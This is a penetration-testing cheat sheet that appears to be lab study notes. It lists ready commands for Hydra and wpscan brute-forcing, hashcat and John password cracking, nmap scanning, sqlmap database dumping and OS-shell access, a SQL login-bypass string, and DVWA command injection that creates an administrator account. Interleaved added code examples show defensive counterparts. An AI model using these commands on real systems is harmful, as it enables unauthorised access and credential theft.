Bug Bounty Tools & Usage

Hashcat Tool
Dictionary Attack

hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
  -m 0 designates the type of hash we are cracking (MD5);
  -a 0 designates a dictionary attack;
  -o cracked.txt is the output file for the cracked passwords;
  target_hashes.txt is our input file of hashes;
  /usr/share/wordlists/rockyou.txt is the path to the wordlist.

 -m values:
     0:    MD5
     100:  SHA1
     1400: SHA256
     1700: SHA512
     900:  MD4
     3200: BCRYPT

It is also important to identify the hash type first:
#hash-identifier
#hash -m [file]

 

HYDRA Tool
FOR FTP

If the username is already known: hydra -l samson -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

If the password is known and the username must be found: hydra -L user.txt -p 123 192.168.1.101 ftp

If neither the username nor the password is known: hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp

Reference = https://www.hackingarticles.in/comprehensive-guide-on-hydra-a-brute-forcing-tool/

FOR SSH

hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 -t 4 ssh

FOR HTTP FORM

hydra -L [user] -P [password] [IP] http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

 

John The Ripper
Single crack mode: john --single --format=raw-sha1 crack.txt
Crack the password in file using wordlist: john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt (Crack.txt here contains the hashes)

Cracking service credentials like ssh

1. First have to convert the hash file to JOHN format : ssh2john /home/text/.ssh/id_rsa > crack.txt (Now we need to crack this crack.txt file with John The Ripper)
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

To crack ZIP

1. zip2john file.zip > crack.txt
2. john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt



Notes:
--wordlist can also be written as -w

john crack.txt --wordlist=rockyou.txt --format=Raw-SHA256

 

NMAP

nmap -sV -sC -oA nmap.txt 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.x
nmap -sS -P0 -A -v 10.10.10.x
masscan -e tun0 -p1-65535 --rate=1000
nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.x

nmap -sn 10.10.10.10/24 -oN nmap.txt
nmap -sC -sV -sS -O 10.10.10.11 -oN nmap.txt
nmap -A 10.10.10.10/24 -oN nmap.txt

nmap -sn -O 172.16.43.1/24 
nmap -sS -sC -sV -O 172.16.43.3 -oN nmap.txt
nmap 172.16.43.1/24

nmap -sV -sC -oA nmap 10.10.10.x
nmap -sC -sV -v -oN nmap.txt 10.10.10.10
nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.1

nmap -f IP
nmap -sn -PR IP
nmap -sn -PE ip-range
nmap -sn 10.10.10.10/24
nmap -sC -sS -sV -O IP
nmap -A IP

-sn disables the port scan (host discovery only)
-PR ARP ping scan
-PU UDP ping scan
-PE ICMP echo ping scan
-f  splits the scan into fragmented IP packets

nmap --script smb-os-discovery.nse IP 
Displays OS, Computer-Name, Domain, WorkGroup and Ports.

 

SQLMAP

URL = http://testphp.vulnweb.com/artists.php?artist=1

Find DBs = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch

Result is DB name acuart

Find Tables = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

Result is table name users

Find columns = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

Dump table = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

Dump the DB = sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --dump-all --batch



Reference = https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/

Using cookies
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx' --random-agent --level=1 --risk=3 --dbs --batch

SQL Injection

On the login page, enter blah' or 1=1-- as the username and click login without entering a password.

OS Shell = sqlmap -u 'url' --dbms=mysql --os-shell
SQL Shell = sqlmap -u 'url' --dbms=mysql --sql-shell
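For the login bypass above, an added example (not from the page) of the string-built query that `blah' or 1=1--` defeats, beside the parameterised query that is not fooled by the same input. The sqlite3 table and the `login_*` function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample users table (plaintext password only to keep the
    demonstration short; real systems store a salted hash)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def login_vulnerable(con, username, password):
    """String concatenation: the quote in "blah' or 1=1--" closes the literal,
    "or 1=1" makes the WHERE clause true for every row and "--" comments out
    the password check, so the first user (admin) is returned."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Parameterised query: values travel separately from the statement, so
    the same input is just a username that does not exist."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None
```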

==============================================================================================

OWASP ZAP
Open ZAP.
Add the website name to Automated Scan.
Click on the Alerts tab to see the vulnerabilities found.

---------------------------------------------------------------------------------------------------------------------------------------------------------

SQL MAP

Open the vulnerable website 
Copy the cookie from the inspect element
Open the terminal to use sqlmap 
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=" --dbs
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope --tables
sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump

You will get all the usernames and passwords of the website.

------------------------------------------------------------------------------------------------------------------------------------------------------

sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the Interactive OS shell.

-------------------------------------------------------------------------------------------------------------------------------------------------------

mysql -u qdpmadmin -h 192.168.1.8 -p
show databases;
use qdpm;
show tables;
select * from users;
show databases;
use staff;
show tables;
select * from login;
select * from user;

Use this when you already have a username and password for the database (-p prompts for the password).

-------------------------------------------------------------------------------------------------------------------------------------------------------

 

WPSCAN

User Enumeration : wpscan --url https://example/ --enumerate u
Bruteforce: wpscan --url https://example/ --passwords wordlist.txt --usernames samson

wpscan --url http://172.16.0.27:8080/CEH/ -U james -P /path/pass.txt

 

Wireshark

To find DoS traffic (SYN and ACK): tcp.flags.syn == 1, or tcp.flags.syn == 1 and tcp.flags.ack == 0
To find passwords submitted in forms: http.request.method == POST
More reference: https://www.comparitech.com/net-admin/wireshark-cheat-sheet/

To find DoS: look for red and black packets with around 1-2 normal packets in between, then pick any packet and check the source and destination IP and port (as the question requires).
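The display filter above isolates bare SYNs; an added example (not from the page) applies the same flag test over constructed packet summaries and flags a source whose SYNs are never followed by an ACK, the trace a SYN flood leaves. Field layout and the `suspected_syn_flood` name are mine.

```python
from collections import Counter

# Constructed packet summaries as (src, dst, dst_port, syn, ack): the same
# fields the Wireshark filters test. One host completes a handshake; another
# sends bare SYNs that it never follows with an ACK.
PACKETS = [
    ("10.0.0.5", "10.0.0.80", 80, 1, 0),     # SYN
    ("10.0.0.80", "10.0.0.5", 50000, 1, 1),  # SYN/ACK reply
    ("10.0.0.5", "10.0.0.80", 80, 0, 1),     # ACK, handshake complete
] + [("198.51.100.7", "10.0.0.80", 80, 1, 0)] * 50


def is_syn_only(pkt):
    """Equivalent of the filter tcp.flags.syn == 1 and tcp.flags.ack == 0."""
    return pkt[3] == 1 and pkt[4] == 0


def is_final_ack(pkt):
    """ACK without SYN: the third step of a handshake (or ordinary data)."""
    return pkt[3] == 0 and pkt[4] == 1


def suspected_syn_flood(packets, threshold=20):
    """Return {src: half-open count} for sources whose SYNs outnumber their
    ACKs by at least `threshold`; a legitimate client nets out near zero."""
    syns = Counter(p[0] for p in packets if is_syn_only(p))
    acks = Counter(p[0] for p in packets if is_final_ack(p))
    return {src: syns[src] - acks[src]
            for src in syns if syns[src] - acks[src] >= threshold}
```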

 

Steganography

snow.exe -C -p "test" confidential.txt

-C  compress / uncompress
-p  password


OpenStego
GUI tool

 

Domain Enumeration

NET USERS /DOMAIN >USERS.TXT
Domain: TEST.local
User Enumeration:
  Windows:
    net user
    net user /domain
    net user [username]
    net user [username] /domain

 

SNMP Enumeration

nmap -sU -p 161 IP
snmp-check IP
Displays network info, network interfaces, network IP, routing info, TCP connections and listening ports, processes, storage info, file systems and device info.


NetBios Enumeration

nbtstat -a IP
-a NetBIOS name table of the remote machine
-c list contents of the NetBIOS name cache

net use
Displays connection status, Shared folder/drive and Network Information.

 

Hash identifier and Hash cracking

Hash Identifier
https://www.onlinehashcrack.com/hash-identification.php

Hash-identifier (CLI)

Hash Crack
https://crackstation.net/
https://hashes.com/en/decrypt/hash

hashcat -a 0 -m 900 hash.txt /rockyou.txt

-a attack mode (0 = dictionary attack)
-m hash type:
  0     MD5
  100   SHA1
  110   SHA1 with salt
  160   HMAC-SHA1
  900   MD4
  1000  NTLM
  1400  SHA256
  1800  SHA512CRYPT
  3200  BCRYPT

John 
1. First analyze hash type - `john hashfile.hash`
2. Then crack hash - `john hashfile.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA1`
3. Show the cracked password - `john --show --format=Raw-SHA1 hashfile.hash` OR `john --show hashfile.hash`
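Both hashcat tables on this page need the right -m value, and raw digests cannot always be told apart by eye. This added example (not from the page, and not the hash-identifier tool itself) maps a hash's format to the candidate -m values listed above; the `identify` name and sample hashes are constructed for illustration.

```python
import re

# Candidate hashcat modes per recognisable format, using the -m numbers this
# page lists. Raw hex digests of equal length are ambiguous (MD5, MD4 and NTLM
# are all 32 hex chars), so several candidates come back and must be confirmed.
HEX_BY_LENGTH = {
    32: [(0, "MD5"), (900, "MD4"), (1000, "NTLM")],
    40: [(100, "SHA1")],
    64: [(1400, "SHA256")],
    128: [(1700, "SHA512")],
}

# Self-describing formats carry a prefix, so they are unambiguous.
PREFIXED = [
    (re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), (3200, "bcrypt")),
    (re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$"), (1800, "sha512crypt")),
]


def identify(h):
    """Return (hashcat mode, name) candidates for one hash string."""
    h = h.strip()
    for pattern, mode in PREFIXED:
        if pattern.match(h):
            return [mode]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_BY_LENGTH.get(len(h), [])
    if ":" in h:  # digest:salt layout, e.g. mode 110 sha1($pass.$salt)
        digest, _salt = h.split(":", 1)
        if re.fullmatch(r"[0-9a-fA-F]{40}", digest):
            return [(110, "sha1($pass.$salt)")]
    return []


def identify_lines(lines):
    """Identify every non-empty line of a hash file, one result per line."""
    return [(line.strip(), identify(line)) for line in lines if line.strip()]


# Constructed samples: md5("password"), sha1("password"), a bcrypt-shaped string.
SAMPLES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
    "$2y$10$" + "a" * 53,
]
```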


Hydra

- **FTP**: `hydra -l user -P passlist.txt ftp://10.10.46.122`
- **FTP** (user and password lists): `hydra -L userlist.txt -P passlist.txt ftp://10.10.46.122`
- SSH: `hydra -l <username> -P <full path to pass> 10.10.46.122 -t 4 ssh`
- Post Web Form: `hydra -l <username> -P <wordlist> 10.10.46.122 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V`

- `hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP]`
- `hydra -l root -P passwords.txt [-t 32] <IP> ftp`
- `hydra -L usernames.txt -P pass.txt <IP> mysql`
- `hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V`
- `hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>`
- `hydra -P common-snmp-community-strings.txt target.com snmp`
- `hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1`
- `hydra -l root -P passwords.txt <IP> ssh`
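The Hydra commands in both sections above leave a burst of failed logins in the target's sshd log; this added example (not from the page) parses constructed auth.log lines and flags sources exceeding a failure threshold inside a short window. The log excerpt, threshold and the `brute_force_sources` name are mine.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt in the default syslog layout.
AUTH_LOG = """\
Mar  4 10:00:01 host sshd[1201]: Failed password for invalid user admin from 192.168.1.50 port 50001 ssh2
Mar  4 10:00:02 host sshd[1202]: Failed password for root from 192.168.1.50 port 50002 ssh2
Mar  4 10:00:02 host sshd[1203]: Failed password for root from 192.168.1.50 port 50003 ssh2
Mar  4 10:00:03 host sshd[1204]: Failed password for root from 192.168.1.50 port 50004 ssh2
Mar  4 10:00:03 host sshd[1205]: Failed password for root from 192.168.1.50 port 50005 ssh2
Mar  4 10:05:00 host sshd[1300]: Failed password for alice from 10.0.0.9 port 40001 ssh2
Mar  4 10:05:09 host sshd[1301]: Accepted password for alice from 10.0.0.9 port 40002 ssh2
"""

FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port"
)


def parse_failures(log):
    """Yield (timestamp, user, source_ip) for every failed sshd login line."""
    for line in log.splitlines():
        m = FAILED.match(line)
        if m:
            # Syslog stamps carry no year; strptime fills a default, which is
            # fine for computing differences within one log.
            yield datetime.strptime(m.group(1), "%b %d %H:%M:%S"), m.group(2), m.group(3)


def brute_force_sources(log, threshold=4, window_seconds=60):
    """Return {source_ip: burst size} for sources with at least `threshold`
    failures inside any `window_seconds` span (hydra -t 4 far exceeds this)."""
    by_src = defaultdict(list)
    for ts, _user, src in parse_failures(log):
        by_src[src].append(ts)
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and (times[j + 1] - times[i]).total_seconds() <= window_seconds:
                j += 1
            if j - i + 1 >= threshold:
                flagged[src] = j - i + 1
                break
    return flagged
```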

 

command Injection

Log in to DVWA.
Set the security level to "Low".
Click on the Command Injection tab.
Check whether the parameter is vulnerable (here it is).
Now enter system commands:
| hostname
| whoami
| dir C:\path.txt
| type path.txt

| net user
| net user Test /Add
| net user
| net user Test
| net localgroup Administrators Test /Add

Successfully created the "Test" user account.
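The DVWA steps above work because user input is pasted into a shell command line. This added example (not from the page) shows that pattern beside the hardened form, an allow-list check plus an argv list run without a shell; `echo` stands in for the vulnerable command so it runs offline, and `run_vulnerable`/`run_hardened` are my names.

```python
import re
import subprocess

# Only plain hostnames / IPv4 literals are accepted; anything else is refused
# before a process is started (an allow-list, not a blacklist of | & ;).
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def run_vulnerable(host):
    """DVWA-style bug: the input is pasted into a command line that /bin/sh
    parses, so '| <cmd>' in the input runs a second program. echo stands in
    for the real command so the example runs offline."""
    out = subprocess.run("echo " + host, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def run_hardened(host):
    """Validate, then pass an argv list with shell=False: the argument reaches
    the program verbatim and no shell ever sees the metacharacters."""
    if not HOST_RE.match(host):
        raise ValueError("rejected input: %r" % host)
    out = subprocess.run(["echo", host], capture_output=True, text=True, check=True)
    return out.stdout.strip()


def is_rejected(host):
    """True when the hardened path refuses the input outright."""
    try:
        run_hardened(host)
    except ValueError:
        return True
    return False
```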
